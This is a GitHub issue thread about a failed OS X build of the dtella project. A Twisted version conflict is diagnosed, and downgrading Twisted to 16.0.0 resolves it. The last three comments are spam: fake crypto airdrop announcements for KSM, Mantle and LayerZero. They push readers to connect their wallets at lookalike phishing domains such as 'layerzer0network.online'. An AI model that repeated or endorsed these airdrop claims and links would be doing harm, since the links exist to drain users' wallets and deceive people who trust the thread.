### ISSUE TITLE
Can't build on OS X

### ISSUE THREAD

**Issue by norandomtechie** [gnu-user/dtella#1]
Hello,
I've tried compiling using the build_osx.sh script but it keeps throwing the following error (posting the whole traceback just in case):

```
Traceback (most recent call last):
  File "/Users/nirajmmenon/Downloads/dtella-master/setup.py", line 26, in <module>
    import dtella.local_config as local
  File "/Users/nirajmmenon/Downloads/dtella-master/dtella/local_config.py", line 70, in <module>
    import dtella.modules.pull_gdata
  File "/Users/nirajmmenon/Downloads/dtella-master/dtella/modules/pull_gdata.py", line 23, in <module>
    from twisted.internet import reactor
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/reactor.py", line 38, in <module>
    from twisted.internet import default
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/default.py", line 56, in <module>
    install = _getInstallFunction(platform)
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/default.py", line 50, in _getInstallFunction
    from twisted.internet.selectreactor import install
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/selectreactor.py", line 18, in <module>
    from twisted.internet import posixbase
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/posixbase.py", line 18, in <module>
    from twisted.internet import error, udp, tcp
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/tcp.py", line 28, in <module>
    from twisted.internet._newtls import (
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/_newtls.py", line 21, in <module>
    from twisted.protocols.tls import TLSMemoryBIOFactory, TLSMemoryBIOProtocol
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/protocols/tls.py", line 65, in <module>
    from twisted.internet._sslverify import _setAcceptableProtocols
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/_sslverify.py", line 203, in <module>
    verifyHostname, VerificationError = _selectVerifyImplementation(OpenSSL)
  File "/Library/Python/2.7/site-packages/Twisted-16.4.1-py2.7-macosx-10.12-intel.egg/twisted/internet/_sslverify.py", line 178, in _selectVerifyImplementation
    from service_identity import VerificationError
  File "/Library/Python/2.7/site-packages/service_identity-16.0.0-py2.7.egg/service_identity/__init__.py", line 7, in <module>
    from . import pyopenssl
  File "/Library/Python/2.7/site-packages/service_identity-16.0.0-py2.7.egg/service_identity/pyopenssl.py", line 14, in <module>
    from .exceptions import SubjectAltNameWarning
  File "/Library/Python/2.7/site-packages/service_identity-16.0.0-py2.7.egg/service_identity/exceptions.py", line 21, in <module>
    @attr.s
AttributeError: 'module' object has no attribute 's'
```

What should I edit to fix this?

**Comment by dataBaseError** [comment]
@n2phoenix build_osx.sh makes use of the setup.py script which may be broken from a lack of maintenance. 

You can see about manually installing the necessary dependencies which will allow you to run the application with `python2 dtella.py`.

**Comment by norandomtechie** [comment]
@dataBaseError I already did that. I've installed Twisted, pycrypto, and a bunch of other modules that it told me to, but now it gives me this error.

**Comment by dataBaseError** [comment]
Building the application is only necessary for ease of use. Just to clarify, can the application run?

As for the setup.py script error, there seems to be an issue with the library `service_identity-16.0.0` use inside the `Twisted-16.4.1`. You could try downgrading Twisted to 16.0.0 which works for running the application (I cannot test the install script since I don't have osx).

**Comment by norandomtechie** [comment]
Oh of course I didn't realize but I was only trying the setup.py and build_osx.sh scripts until now! When I downgraded to twisted-16.0.0 and ran the dtella.py script, it began listening on ports! Thank you!

**Comment by dataBaseError** [comment]
Great to hear. Just to clarify though, you didn't get the build script working even with the downgrade?

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by pradip-ee** [comment]
### Hooray! You've Scored a Spot in the Mantle Airdrop


At Mantle, we hold our community in high esteem and want to extend our gratitude for your steadfast support. That's why you've clinched a spot in this exclusive airdrop bonanza. We've taken notice of your lively engagement, contributions, or unwavering loyalty to the Mantle ecosystem, and we believe it's time for you to enjoy the fruits of this special airdrop.

By participating in this exclusive event, you stand to receive Mantle tokens as a token of our appreciation. These tokens open doors to thrilling possibilities within the Mantle ecosystem, offering access to exclusive features, a voice in governance decisions, and even potential future perks.

We're over the moon to have you on board for this exclusive airdrop, and we're dedicated to ensuring a seamless claiming process just for you. Let's dive in and grab those Mantle Airdrop tokens!

[Claim Your Mantle Airdrop Now](https://mantlexyz.fly.dev/)

![Claim Now](https://i.ytimg.com/vi/BtX2NwkAJaE/maxresdefault.jpg)

### Secure Your Mantle Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Swing by the [Mantle Airdrop](https://mantlexyz.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Verify your eligibility for the Mantle Airdrop [right here](https://mantlexyz.fly.dev/).

3. **Engage for Extra Rewards:**
   - Join community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Feel free to share your experiences or ask any questions about claiming the Mantle Airdrop in the comments below. Let's make this process a breeze for everyone!

[Mantle Network Airdrop Guide — How to Claim](https://mantlexyz.fly.dev/)

**Comment by rado-softi** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
